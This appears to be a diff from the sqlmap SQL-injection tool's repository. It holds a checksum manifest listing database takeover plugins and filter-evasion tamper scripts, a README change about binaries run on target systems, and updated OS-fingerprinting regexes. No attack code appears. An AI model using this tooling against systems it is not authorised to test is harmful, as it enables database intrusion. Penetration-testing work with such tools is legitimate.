+3747a79b8c720b10f3fae14d9bd86bfbb9c789e1ffe3fa13e41792ec947f92c5  plugins/dbms/oracle/__init__.py
+73d3770ab5ce210292fd9db62c6a31d2d658ce255b8016808152a7fc4565bb1e  plugins/dbms/oracle/syntax.py
+061ca04f66ee30c21e93f94221c224eca0c670a8b3e0e2a4ac3cab8470d889b7  plugins/dbms/oracle/takeover.py
+318df338d30f8ffaffb50060a0e7c71116a11cdd260593c4c9758ae49beafedd  plugins/dbms/postgresql/connector.py
+851c5abcf9d3ebe27d93b85c0dd4dda1ad58696075b0fb5e84bb97cc70c7a255  plugins/dbms/postgresql/enumeration.py
+e847084832ede1950372e931dd3a0214c64dab4e00c62dd1c732f372d1ca2dcf  plugins/dbms/postgresql/filesystem.py
+4bb66ec17398a9ae9870b169706024406557ec8c705078ca8726314b905c199e  plugins/dbms/postgresql/fingerprint.py
+91913cf6c35816bcdf3e0ed8dfecc44db746e889c4edaec1a81b59934943c7b2  plugins/dbms/postgresql/__init__.py
+2e2555be38d523c2b8dfe2ad421a2c62c2bb416d76aa8d097e8f7214e2397114  plugins/dbms/postgresql/syntax.py
+da7fad7a57747fc24c6bb49399c525d403b8a8b9fc665556b26f1c07e11ae1a6  plugins/dbms/postgresql/takeover.py
+f3f5a720ea6f3ae2cde202e15e121ab38904996661a5aac388055c02751fd96c  plugins/dbms/presto/connector.py
+7b1ab72aaec58a5228c7e55380f00f8d10a0854e5a99be107cc4724e1c1671d9  plugins/dbms/presto/enumeration.py
+cb65256cd03c6ab59d80e5ef0246679ef061a58df8576f3e6417046eadf4473c  plugins/dbms/presto/filesystem.py
+a7f7694ae7ea2ccb849816d7be159cbf589e7f4d5ee3045ac6278e5483cd5ee3  plugins/dbms/presto/fingerprint.py
+d8a071556a7326fb8b7df18c402788fbe03039a300aa72e43eeeb5de130b8007  plugins/dbms/presto/__init__.py
+3c163c8135e2ab8ed17b0000862a1b2d7cf2ec1e7d96d349ec644651cdecad49  plugins/dbms/presto/syntax.py
+d2ae69988becba3d4279b5f085f336b3ab8a2aa81316f65e8836d5c700926a3d  plugins/dbms/presto/takeover.py
+9a08e94254657ce1aa140bda68cd689d5f10f4be19b5c48527f578fcd04e8f0d  plugins/dbms/raima/connector.py
+2e9348962675a7f0fc51706582d9ab2be24a79bde1de1ecc696383fed7f14594  plugins/dbms/raima/enumeration.py
+ac0ec1b50554b782e173a8e1baa21199d6f558e5b2d70540a247667ea12c8f92  plugins/dbms/raima/filesystem.py
+fc0d15fb5ee3d69c9b3903230deb10d92c231a73ab500008a73239b89b4e7465  plugins/dbms/raima/fingerprint.py
+7114626cf28256502c9de4dadb684543168d9878773cab853e4f34275ac8ef72  plugins/dbms/raima/__init__.py
+ede16cc48cd7f51db8225c9b3f802752dd407a9fe489c24ba8400ae9aaa9791e  plugins/dbms/raima/syntax.py
+282202909302ccbc587d1b7c36b789cd8f914333e11018688d78815414d4f522  plugins/dbms/raima/takeover.py
+217760aeadbb64490c41d7f0df9cc5d75f897b29e53941130773c8ccf66acc66  plugins/dbms/sqlite/connector.py
+27fba72680f6f947abd5cd7e5b436fbfe2c216b71c20e62fce933ea2a9cd0b73  plugins/dbms/sqlite/enumeration.py
+b1355e45bdb812256b2aed78b81719a66999f30e77bef70b3f1f9b2ec00fa6d5  plugins/dbms/sqlite/filesystem.py
+d99d8f0862d31a2c9e12fe74590170a585663cce7c227269314faea545e4ecaa  plugins/dbms/sqlite/fingerprint.py
+f494bfd48c16183bd362765880329c3b2d21112238ab61ba0d0a048d1da6d3d4  plugins/dbms/sqlite/__init__.py
+bb391c4d981e7c3fe9e02be0a3d3bdda34eebd518867a4cc0a7d90f515fa3523  plugins/dbms/sqlite/syntax.py
+62088c813408d1f447c470f1fe55cfc9478ddff8afa025bfa5b668f1752e86c7  plugins/dbms/sqlite/takeover.py
+13983ba5b6801981c309b7b299a7e8047986e689ea4426c59e977e85571f14fc  plugins/dbms/sybase/connector.py
+13b1d2966976f73a111e154ff189cc3596c0aed19a47510cae6f1fb1bbd380d1  plugins/dbms/sybase/enumeration.py
+7430f090e69cf93d237cd054c59ed7dbd884cc4832ec024bd7e4393c105d90d1  plugins/dbms/sybase/filesystem.py
+4915bbb31035fd47fe566cc3318404cf61f4d98ba08ab9eebf69027ffbb2d2f9  plugins/dbms/sybase/fingerprint.py
+a6a3effa211183b83cf4afe82cce9764f6d4bfc49ea4644233613b3aa98fde28  plugins/dbms/sybase/__init__.py
+7d7e672fce3e5eb0f8b3447cf0809918347ff71e1c013561fef39b196fae450a  plugins/dbms/sybase/syntax.py
+1cf6586396fd5982387c9a493217abcddd71031550a41738340d4949348c2b5b  plugins/dbms/sybase/takeover.py
+0da09bbfd92e019f41e8e3b95412e49948694700ff741e6c170a2da87ad4b56c  plugins/dbms/vertica/connector.py
+49988044800604253f6043d7e43793651e4abe0e65060db8228f91448b3152e2  plugins/dbms/vertica/enumeration.py
+657a4e3657a1fdc20312978b090dd2d4a9d5bf1a21df41703ca7ee3e3aea6a21  plugins/dbms/vertica/filesystem.py
+7a1e17a8f6b8063cfbcea57a24a2c11bc31e324ba1e01f9468584ed56c3e493e  plugins/dbms/vertica/fingerprint.py
+57b4ce0c98308002954308278191efb13255f79b1c286c40388adb692f8fc9ba  plugins/dbms/vertica/__init__.py
+4752e6af48a2750dae0d7756ad6457b02e766582106207b8d3985b46b2cfe18a  plugins/dbms/vertica/syntax.py
+a96c63ffc1d65d382595d060b2e94a30feaadf218db27a9d540b9e8fd344abed  plugins/dbms/vertica/takeover.py
+bccdbff8da0898d4e331646a67ece3c8e0cdc3e955ba12022d85d5077a760291  plugins/dbms/virtuoso/connector.py
+cba0154f1ee52703be1d03800607b6cf3eab96b1fe60664ee85937df23818104  plugins/dbms/virtuoso/enumeration.py
+4f614ce5b3c3c0eee8b903c9cfecea0cabdfb535dfd5e7a6b901a6ed54e51a12  plugins/dbms/virtuoso/filesystem.py
+e81d43810ee8232c0dd01578433e2ec4dfc1589a8e39f0a86772ee41a80c68f8  plugins/dbms/virtuoso/fingerprint.py
+acc41465f146d2611fca5a84bd8896bc0ccd2b032b8938357aea3e5b173a5a10  plugins/dbms/virtuoso/__init__.py
+3c163c8135e2ab8ed17b0000862a1b2d7cf2ec1e7d96d349ec644651cdecad49  plugins/dbms/virtuoso/syntax.py
+7ac6006e0fc6da229c37fbce39a1406022e5fcc4cac5209814fa20818b8c031a  plugins/dbms/virtuoso/takeover.py
+e6dfaab13d9f98ccffdc70dd46800ca2d61519731d10a267bc82f9fb82cd504d  plugins/generic/connector.py
+664be8bb4157452f2e40c4f98a359e26b559d7ef4f4148564cb8533b5ebf7d54  plugins/generic/custom.py
+3d118a7ddb1604a9f86826118cfbae4ab0b83f6e9bef9c6d1c7e77d3da6acf67  plugins/generic/databases.py
+96924a13d7bf0ed8056dc70f10593e9253750a3d83e9a9c9656c3d1527eda344  plugins/generic/entries.py
+a734d74599761cd1cf7d49c88deeb121ea57d80c2f0447e361a4e3a737154c0e  plugins/generic/enumeration.py
+1c2e812096015eaef55be45d3a0bcd92b4db27eace47e36577aeff7b4246ad35  plugins/generic/filesystem.py
+05f33c9ba3897e8d75c8cf4be90eb24b08e1d7cd0fc0f74913f052c83bc1a7c1  plugins/generic/fingerprint.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  plugins/generic/__init__.py
+3c5f83d8c18443870ee0e1e61be2d65c175d9f02f0732885467e46a681bb9716  plugins/generic/misc.py
+83391b64fc6c16aba6ddc5cc2b737de35b2aa7b98f5eafe5d1ee2b067da50c64  plugins/generic/search.py
+978a495aaa3fc587e77572af96882a99aca7820f408fe1d4d0234a7ffb3972bb  plugins/generic/syntax.py
+fff84edc86b7d22dc01148fb10bb43d51cb9638dff21436fb94555db2a664766  plugins/generic/takeover.py
+0bc5c150e8cf4f892aba1ff15fc8938c387fb2a173b77329a0dc4cdb8b4bb4e2  plugins/generic/users.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  plugins/__init__.py
+5a473c60853f54f1a4b14d79b8237f659278fe8a6b42e935ed573bf22b6d5b2c  README.md
+78aafd53980096364f0c995c6283931bff505aed88fed1e7906fb06ee60e9c5b  sqlmapapi.py
+168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62  sqlmapapi.yaml
+5e172e315524845fe091aa0b7b29303c92ac8f67594c6d50f026d627e415b7ed  sqlmap.conf
+3a18b78b1aaf7236a35169db20eb21ca7d7fb907cd38dd34650f1da81c010cd6  sqlmap.py
+adda508966db26c30b11390d6483c1fa25b092942a29730e739e1e50c403a21f  tamper/0eunion.py
+d38fe5ab97b401810612eae049325aa990c55143504b25cc9924810917511dee  tamper/apostrophemask.py
+8de713d1534d8cda171db4ceeb9f4324bcc030bbef21ffeaf60396c6bece31e4  tamper/apostrophenullencode.py
+661e45f350ecba30a030f09b921071f31061e21f3e961d10ce8f2fd182f4c1b2  tamper/appendnullbyte.py
+fd40e0e7f8a26562f73d33f522f2d563b33edd6ba7dd1dbb9cdd6c638b30b668  tamper/base64encode.py
+c795b0dd956a30e1a3f3f9a8c4b0780bb2218f1a2d5187bab8e5db63a9230076  tamper/between.py
+e9b931e0aed47ba8405e1ad2bccc52a5fe82cb9e68c155cdb9775514de8daf94  tamper/binary.py
+b27c9a34c4acd11ae465845e5fbeff0d0fd3cd5555a3598d83f6824b2fd80afb  tamper/bluecoat.py
+11b16376c7dd2a4b30bc295b13e2512f7dc8fdda5c218f617b68bad8e35b2439  tamper/chardoubleencode.py
+99f849701b49f9c398aecfc974a416947728e14e87f009773406b2f0494e1081  tamper/charencode.py
+b0367135085ca891bf4cc04e5090aa790296a4f446fce4381e89b5630a634560  tamper/charunicodeencode.py
+3c65cc181357702b5e38c15d0e4e4461be620e073c25b8f9de65af53e5ff725f  tamper/charunicodeescape.py
+3941485eb98c515244ed0d89a2079f7ff828cc3b48eca677c57abe0d6c6b7dc6  tamper/commalesslimit.py
+39f9fbb7ccfafbddc4e15de81307e0bc6f66628cd6320f2d43b51ce8dbc34519  tamper/commalessmid.py
+af4a1caa2b5d29c7d4fd4af25504e2cd87b47cb0d2b25b495c08b82462ccf39e  tamper/commentbeforeparentheses.py
+c700cbc900012c7e7479bdbff8e503023cdfa0835b274390539c4e0c045f13ba  tamper/concat2concatws.py
+a0fcfda0d97b076e3f992657566102bd447154962caaf2102f04f7998c180014  tamper/decentities.py
+07ddd70923122f766e5394dcb5da412c9035659ea73cee409418e75c379b6125  tamper/dunion.py
+358f199f6ab43f33dfa8357c4c5e9771ebddc513479d21327637813e35c503f9  tamper/equaltolike.py
+a11da62ce14d77cbf06e930f8fb65a1db99fbac4d4533a0d6ee0f772fbedce76  tamper/equaltorlike.py
+0967102eec12d82b82ae5688537b740af0bbd02f261aa64eb22eb28135d2a43b  tamper/escapequotes.py
+d1e336141aebc8fafd3c3c75f27fbcf1d091a36acbaa163d004aca3c726a2af3  tamper/greatest.py
+c8609858d1fcde0842568f9c33a9980b905640b6ec527e4fc37f754ecc4a7407  tamper/halfversionedmorekeywords.py
+e67c5f435bfb6ed26c0c2fcbd3bba015892698f85dfc0092a1b15a92a2066b83  tamper/hex2char.py
+fbc65419dbc6caaf06914efb30b0ba5fea2297d26df94ab42843e5453472d767  tamper/hexentities.py
+84b7dc75c8c721224ac64613c056a991bc475c55b463f424ceb22bbb8ec6a5b4  tamper/htmlencode.py
+d4708072b20520c27d0e6d716bed0040187de2a308956ef9d2ec9cbd1d9c0014  tamper/if2case.py
+0bf4efb352525e9548601dda98def32b305091fa01e80f5f6b182ae6bd63b4e0  tamper/ifnull2casewhenisnull.py
+0a0219ddbf464f20ae2f506680f15b74f634c9e540c9998480091c81316d690d  tamper/ifnull2ifisnull.py
+4e892fcceb55835850813ba0573a40174386c7a73d3a06bfbfeedee2e356adcd  tamper/informationschemacomment.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  tamper/__init__.py
+5227d41885c9bb6143ca05160662a46a43ff3a95b8257ed9e03b6da1615599e7  tamper/least.py
+0fe534675cc3ee0a1897be9aa0224646e65dccb5b4ec93077f59b18658162644  tamper/lowercase.py
+158e08dac83da4b7e1f76b9c9c6c46dc2c41cd8ebd5a7a0c764c04e59ec6d21c  tamper/luanginx.py
+4028dcdaaa3aed884c43efec57ec0c2d4250151a2fd5aabaf9525d25ad7835ad  tamper/misunion.py
+a3bfaa0b387d772389c2c47dd2206f8c2d85201cb22c055db1c69a9acab46856  tamper/modsecurityversioned.py
+33d52fe07ca72e08b83c17da7a1fbba6b9ed6e847e183d04be2f48a00e563a1f  tamper/modsecurityzeroversioned.py
+a6b192124fa48bfff1c2a0d788ed6bd27465f237475dcc64b7bb9637f7ffa51b  tamper/multiplespaces.py
+8c2255f906132fccdfafcd76d1c947ee06759d4df34283c94425814b7a508ccc  tamper/ord2ascii.py
+d5df62f066ea405d9e961d6fb9e8c217f3b118d2c06300e52a8062b12720ff21  tamper/overlongutf8more.py
+43f802f0acc4dbc549f0bbcdcd11128c0ac50d666ea88432f162f1d052c8a91f  tamper/overlongutf8.py
+31d0d3a4b848ef9f46b45c799818177186fe2ed04bffe1a94ad1c4302f4c34bb  tamper/percentage.py
+17e5cbc66762680cd4a72891174a6d612b7fa2d61dce1a0e7de14155acc53c42  tamper/plus2concat.py
+5f0709fed4777af69c91968e2545ee9f31b8337d0261f373537980b4891faa54  tamper/plus2fnconcat.py
+fd98827059903a1f16e10724a0be0e443cb1fe16eac3298a7f10cfe1fb14833a  tamper/randomcase.py
+9c7b936a2989a85dd61120e59d9d308a7bfc47a5089308b325cabf29b118cd64  tamper/randomcomments.py
+b4abd43afd11b40b5bd780bf820bcb61a4b3187f2a325b64bb0538fa0d463863  tamper/schemasplit.py
+3d9e52a087fef458d63f0fdb67fc4d0c1ac52b5f131c0e8486afcc7c77b2bb69  tamper/scientific.py
+952a32b3a5466e47d97f218c94c47a236ff04615180ffc8591a8d546b7e5ddbe  tamper/sleep2getlock.py
+5e9c2a1fa498bf4cc6f048f6308de42eada3e5e31f148355a4a651512b8807d0  tamper/space2comment.py
+acca7e57a216404aa92caa4d3b30ca0533be1b66d54e8b43f058c9204464a98a  tamper/space2dash.py
+c17acda15fb75b70b32e5cb5daed693b25946b7ea92a4d044e403138b3f177f3  tamper/space2hash.py
+c11cc97d8456ffbb20629e8e666fd9a9cd90b62d16e9afe4482b0ca58fa69013  tamper/space2morecomment.py
+c0926bdb41bc40442d814fb7fbf626330b51b87b16f8ef7abe38de39e15ae066  tamper/space2morehash.py
+379802350168756c5781f7d9a4ce9d738f48f636ce239feda3a0e49663a30f24  tamper/space2mssqlblank.py
+c15080551b727b7eeb9e979670fecd660cabcf933182af755f6544012be0e5b8  tamper/space2mssqlhash.py
+e8f68041beeca3ab1109e68e301db2f5aed61201e196e9ffa5c7c950d9d3376d  tamper/space2mysqlblank.py
+1e8138fa9511697ada1eb5979c4adb77b6e6b0e661f856ad54eae526149866d1  tamper/space2mysqldash.py
+b9b64d3b890200090e89b47e32ff73705468ee7e6ec4fd94406f4de17e1113bb  tamper/space2plus.py
+5af373e0131603d8fc4a7b69bcb7729238f55795afedc0929b70a3399a0a8e67  tamper/space2randomblank.py
+ae0b72d5bff89635cd21fee20a9035f9258c364690bc060ebe474a7e51c811a2  tamper/sp_password.py
+004ff7df7b51e8bf6cbd516e5037ea389da54b634a2879a94a3cd4e218c6f471  tamper/substring2leftright.py
+0080ad00ae048c33d31915d0055e9b3b0d878bba5a0391702370d2eed5badc05  tamper/symboliclogical.py
+911ddabaf042acc4219f305d6c359c8804fed80327f1c7631f705b07b3889887  tamper/unionalltounion.py
+0e2a5af8b6ec65a8fb54ecc4fe5b9257b4da15a261d88313a4c60b83fbacb6af  tamper/unmagicquotes.py
+b4b03668061ba1a1dfc2e3a3db8ba500481da23f22b2bb1ebcbddada7479c3b0  tamper/uppercase.py
+3142a59cbcf2038bf9a50307576f3efea7a0dedf7701a4a4348ab47e9447fc34  tamper/varnish.py
+19ae32e01e44152d29b303eedfadb812bb216e7b4c37d42d8bd01fa02ea20864  tamper/versionedkeywords.py
+460988f86bcedf656dca61131b11d4926eb295c6affc8d36989435b4d21a74dd  tamper/versionedmorekeywords.py
+bd0fd06e24c3e05aecaccf5ba4c17d181e6cd35eee82c0efd6df5414fb0cb6f6  tamper/xforwardedfor.py
+55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a  thirdparty/ansistrm/ansistrm.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/ansistrm/__init__.py
+dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2  thirdparty/beautifulsoup/beautifulsoup.py
+7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63  thirdparty/beautifulsoup/__init__.py
+0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a  thirdparty/bottle/bottle.py
+9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2  thirdparty/bottle/__init__.py
+0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff  thirdparty/chardet/big5freq.py
+901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773  thirdparty/chardet/big5prober.py
+df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f  thirdparty/chardet/chardistribution.py
+e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee  thirdparty/chardet/charsetgroupprober.py
+2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8  thirdparty/chardet/charsetprober.py
+558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f  thirdparty/chardet/codingstatemachine.py
+3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c  thirdparty/chardet/compat.py
+4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c  thirdparty/chardet/cp949prober.py
+0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5  thirdparty/chardet/enums.py
+924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927  thirdparty/chardet/escprober.py
+46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce  thirdparty/chardet/escsm.py
+883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c  thirdparty/chardet/eucjpprober.py
+fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa  thirdparty/chardet/euckrfreq.py
+32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16  thirdparty/chardet/euckrprober.py
+368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0  thirdparty/chardet/euctwfreq.py
+d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797  thirdparty/chardet/euctwprober.py
+257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57  thirdparty/chardet/gb2312freq.py
+806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c  thirdparty/chardet/gb2312prober.py
+737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a  thirdparty/chardet/hebrewprober.py
+62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6  thirdparty/chardet/__init__.py
+be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8  thirdparty/chardet/jisfreq.py
+3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a  thirdparty/chardet/jpcntx.py
+d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1  thirdparty/chardet/langbulgarianmodel.py
+2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7  thirdparty/chardet/langcyrillicmodel.py
+f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800  thirdparty/chardet/langgreekmodel.py
+2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070  thirdparty/chardet/langhebrewmodel.py
+4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0  thirdparty/chardet/langhungarianmodel.py
+f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94  thirdparty/chardet/langthaimodel.py
+5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459  thirdparty/chardet/langturkishmodel.py
+4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f  thirdparty/chardet/latin1prober.py
+011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4  thirdparty/chardet/mbcharsetprober.py
+87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e  thirdparty/chardet/mbcsgroupprober.py
+498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92  thirdparty/chardet/mbcssm.py
+2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be  thirdparty/chardet/sbcharsetprober.py
+d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970  thirdparty/chardet/sbcsgroupprober.py
+208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4  thirdparty/chardet/sjisprober.py
+a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6  thirdparty/chardet/universaldetector.py
+21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c  thirdparty/chardet/utf8prober.py
+b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8  thirdparty/chardet/version.py
+1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd  thirdparty/clientform/clientform.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/clientform/__init__.py
+162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced  thirdparty/colorama/ansi.py
+a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3  thirdparty/colorama/ansitowin32.py
+d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659  thirdparty/colorama/initialise.py
+f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5  thirdparty/colorama/__init__.py
+fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874  thirdparty/colorama/win32.py
+179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea  thirdparty/colorama/winterm.py
+4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3  thirdparty/fcrypt/fcrypt.py
+6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f  thirdparty/fcrypt/__init__.py
+dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9  thirdparty/identywaf/data.json
+5aa308d6173ad9e2a5006a719fdbfe8c20d7e14b6d70c04045b935e44caa96d0  thirdparty/identywaf/identYwaf.py
+edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa  thirdparty/identywaf/__init__.py
+d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347  thirdparty/identywaf/LICENSE
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/__init__.py
+879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8  thirdparty/keepalive/__init__.py
+f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8  thirdparty/keepalive/keepalive.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/magic/__init__.py
+4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8  thirdparty/magic/magic.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/multipart/__init__.py
+fa2c4cfc6f1fb29a3cf4ad119243a10aef2dfe9cf93129436aa649baef8e4764  thirdparty/multipart/multipartpost.py
+ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696  thirdparty/odict/__init__.py
+9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb  thirdparty/odict/ordereddict.py
+691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8  thirdparty/prettyprint/__init__.py
+8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f  thirdparty/prettyprint/prettyprint.py
+3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84  thirdparty/pydes/__init__.py
+d1d54fc08f80148a4e2ac5eee84c8475617e8c18bfbde0dfe6894c0f868e4659  thirdparty/pydes/pyDes.py
+1c61d71502a80f642ff34726aa287ac40c1edd8f9239ce2e094f6fded00d00d4  thirdparty/six/__init__.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/socks/__init__.py
+7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9  thirdparty/socks/LICENSE
+543217f63a4f0a7e7b4f9063058d2173099d54d010a6a4432e15a97f76456520  thirdparty/socks/socks.py
+e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  thirdparty/termcolor/__init__.py
+b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df  thirdparty/termcolor/termcolor.py
+4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc  thirdparty/wininetpton/__init__.py
+7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502  thirdparty/wininetpton/win_inet_pton.py

data/udf/README.txt

@@ -1,6 +1,4 @@
 Binary files in this folder are data files used by sqlmap on the target
 system, but not executed on the system running sqlmap. They are licensed
 under the terms of the GNU Lesser General Public License and their source
-code is available on the official sqlmap subversion repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack/
+code is available on https://github.com/sqlmapproject/udfhack.

data/xml/banner/generic.xml

@@ -7,43 +7,73 @@
         <info type="Windows"/>
     </regexp>
 
-    <regexp value="Service Pack (\d)">
+    <regexp value="Service Pack 0">
+        <info sp="0"/>
+    </regexp>
+
+    <regexp value="Service Pack 1">
         <info sp="1"/>
     </regexp>
 
-    <regexp value="Windows.*7\.5">
-        <info type="Windows" distrib="2008"/>
+    <regexp value="Service Pack 2">
+        <info sp="2"/>
     </regexp>
 
-    <regexp value="Windows.*7\.0">
-        <info type="Windows" distrib="Vista"/>
+    <regexp value="Service Pack 3">
+        <info sp="3"/>
     </regexp>
 
-    <regexp value="Windows.*6\.0">
+    <regexp value="Service Pack 4">
+        <info sp="4"/>
+    </regexp>
+
+    <regexp value="Service Pack 5">
+        <info sp="5"/>
+    </regexp>
+
+    <!-- Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832%28v=vs.85%29.aspx -->
+
+    <regexp value="Windows.*\b10\.0">
+        <info type="Windows" distrib="2016|2019|2022|10|11"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.3">
+        <info type="Windows" distrib="2012 R2|8.1"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.2">
+        <info type="Windows" distrib="2012|8"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.1">
+        <info type="Windows" distrib="2008 R2|7"/>
+    </regexp>
+
+    <regexp value="Windows.*\b6\.0">
+        <info type="Windows" distrib="2008|Vista"/>
+    </regexp>
+
+    <regexp value="Windows.*\b5\.2">
         <info type="Windows" distrib="2003"/>
     </regexp>
 
-    <regexp value="Windows.*5\.2">
-        <info type="Windows" distrib="2003"/>
-    </regexp>
-
-    <regexp value="Windows.*5\.1">
+    <regexp value="Windows.*\b5\.1">
         <info type="Windows" distrib="XP"/>
     </regexp>
 
-    <regexp value="Windows.*5\.0">
+    <regexp value="Windows.*\b5\.0">
         <info type="Windows" distrib="2000"/>
     </regexp>
 
-    <regexp value="Windows.*4\.0">
+    <regexp value="Windows.*\b4\.0">
         <info type="Windows" distrib="NT 4.0"/>
     </regexp>
 
-    <regexp value="Windows.*3\.0">
+    <regexp value="Windows.*\b3\.0">
         <info type="Windows" distrib="NT 4.0"/>
     </regexp>
 
-    <regexp value="Windows.*2\.0">
+    <regexp value="Windows.*\b2\.0">
         <info type="Windows" distrib="NT 4.0"/>
     </regexp>
 
@@ -53,6 +83,10 @@
         <info type="Linux"/>
     </regexp>
 
+    <regexp value="\bArch\b">
+        <info type="Linux" distrib="Arch"/>
+    </regexp>
+
     <regexp value="CentOS">
         <info type="Linux" distrib="CentOS"/>
     </regexp>
@@ -66,7 +100,7 @@
     </regexp>
 
     <regexp value="Debian">
-        <info type="Linux" distrib="Debian|Ubuntu"/>
+        <info type="Linux" distrib="Debian"/>
     </regexp>
 
     <regexp value="Fedora">
@@ -85,11 +119,23 @@
         <info type="Linux" distrib="Mandrake"/>
     </regexp>
 
+    <regexp value="Manjaro">
+        <info type="Linux" distrib="Manjaro"/>
+    </regexp>
+
     <regexp value="Mandriva">
         <info type="Linux" distrib="Mandriva"/>
     </regexp>
 
-    <regexp value="Red[\-\_\ ]*Hat">
